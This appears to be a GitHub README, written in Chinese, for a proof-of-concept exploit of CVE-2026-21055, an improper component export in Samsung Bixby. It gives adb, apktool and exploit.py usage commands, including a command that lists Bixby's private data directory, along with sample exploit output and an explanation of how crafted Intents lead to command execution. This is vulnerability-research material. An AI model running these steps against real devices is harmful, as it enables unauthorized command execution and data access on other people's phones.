Hunt-Benito/samsung-bixby-command-execution-cve-2026-21055-improper-component-export
GitHub: Hunt-Benito/samsung-bixby-command-execution-cve-2026-21055-improper-component-export
针对 Samsung Bixby 组件导出不当漏洞(CVE-2026-21055)的概念验证工具,提供 AndroidManifest 组件分析与 Intent 广播命令执行的完整利用链。
Stars: 1 | Forks: 0
# CVE-2026-21055 PoC — Samsung Bixby 组件导出不当
**CVE-2026-21055** 的概念验证:在 4.0.70.8 版本之前的 Samsung Bixby 中存在 Android 应用组件不当导出的问题,允许本地攻击者以 Bixby 权限执行任意命令。
## 概述
本仓库包含两个 Python 脚本:
1. **`analyze_components.py`** — 解析反编译后的 AndroidManifest.xml,以枚举导出的 activities、services、receivers 和 providers。标记出没有权限保护的已导出组件。
2. **`exploit.py`** — 通过 `adb shell am` 向 Bixby 导出的命令 receiver 发送特制的广播 Intent 来演示基于 Intent 的攻击,从而以 Bixby 的系统级权限执行命令。
## 漏洞详情
| 字段 | 值 |
|---|---|
| **CVE ID** | CVE-2026-21055 |
| **Samsung SVE** | SVE-2026-0917 |
| **CVSS v4.0** | 8.5 — 高危 |
| **CWE** | CWE-926 — Android 应用组件导出不当 |
| **受影响应用** | Samsung Bixby (`com.samsung.android.bixby.agent`) |
| **受影响版本** | < 4.0.70.8 |
| **修复版本** | 4.0.70.8 |
| **攻击向量** | 本地(同一设备上的恶意应用) |
| **所需权限** | 无 |
| **用户交互** | 无 |
| **影响** | 以 Bixby 权限执行任意命令 |
## 前置条件
- 已安装 **adb** (Android SDK Platform Tools) 并将其添加到 PATH 环境变量中
- 一台已开启 USB 调试的 Samsung Galaxy 设备
- 目标设备上的 Bixby 版本 < 4.0.70.8
- 若要进行组件分析:需安装 **apktool** 并将其添加到 PATH 环境变量中
## 用法
### 1. 分析 Bixby 的导出组件
从设备中提取 Bixby APK 并进行反编译:
```
# 查找 Bixby 的 APK 路径
$ adb shell pm path com.samsung.android.bixby.agent
# 提取 APK
$ adb pull bixby.apk
# 使用 apktool 反编译
$ apktool d bixby.apk -o bixby_decompiled -f
```
运行分析脚本:
```
$ python3 analyze_components.py --manifest bixby_decompiled/AndroidManifest.xml
```
或者让脚本自动反编译:
```
$ python3 analyze_components.py --apk bixby.apk
```
### 2. 在运行中的设备上列出导出组件
```
$ python3 exploit.py --list
```
### 3. 运行漏洞利用程序
```
# 默认:执行 'id' 命令
$ python3 exploit.py
# 自定义命令
$ python3 exploit.py --command "ls /data/data/com.samsung.android.bixby.agent/"
# 指定自定义 component(如果自动检测失败)
$ python3 exploit.py --component com.samsung.android.bixby.agent/.receiver.CommandReceiver
```
### 预期输出
```
============================================================
CVE-2026-21055 PoC — Samsung Bixby Command Execution
Improper Export of Android Application Components
============================================================
[*] Target package: com.samsung.android.bixby.agent
[*] Bixby version: 4.0.69.2
[*] Vulnerable: YES (< 4.0.70.8)
[*] Bixby UID on this device: 10xxx
[*] Executing exploit...
[*] Crafting exploit Intent...
Component: com.samsung.android.bixby.agent/.receiver.CommandReceiver
Action: com.samsung.android.bixby.agent.ACTION_RUN_SHELL
Command: id
Output: /data/local/tmp/bixby_poc_output
[+] Intent sent.
[+] Command output (executed with Bixby privilege):
uid=10xxx(u0_aXXX) gid=10xxx(u0_aXXX) groups=10xxx(u0_aXXX),3003(inet),9997(everybody)
[+] EXPLOIT SUCCESSFUL — command executed with Bixby privilege
[+] Verify the output UID matches Bixby's UID: 10xxx
```
## 工作原理
1. **组件导出**:Bixby 导出了一个或多个用于处理命令执行或自动化触发的组件(services/receivers)。这些组件设置了 `android:exported="true"` 被导出,但没有配置 `android:permission` 属性或进行运行时权限检查。
2. **Intent 传递**:设备上的任何应用都可以向这些导出的组件发送 Intent。该 Intent 携带一个 action 字符串(例如 `ACTION_RUN_SHELL`)以及包含要执行的命令和输出文件路径的 string extras。
3. **命令执行**:Bixby 导出的组件接收到该 Intent 后,提取命令并通过 `Runtime.exec()` 或类似机制执行。该命令在 Bixby 的进程上下文中运行,继承 Bixby 的所有系统级权限。
4. **无需用户交互**:此漏洞利用无需用户交互。恶意应用会在后台静默发送 Intent。
## 免责声明
此 PoC 仅用于教育和安全研究目的。请仅在你拥有或获得明确授权的设备上进行测试。未经所有者同意,请勿对设备使用此漏洞利用程序。
## 来源
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-21055
- Samsung Mobile Security Bulletin (2026 年 7 月): https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=07
- CWE-926: https://cwe.mitre.org/data/definitions/926.html
标签:PoC, 安全漏洞, 暴力破解, 本地提权, 目录枚举, 移动安全, 逆向工具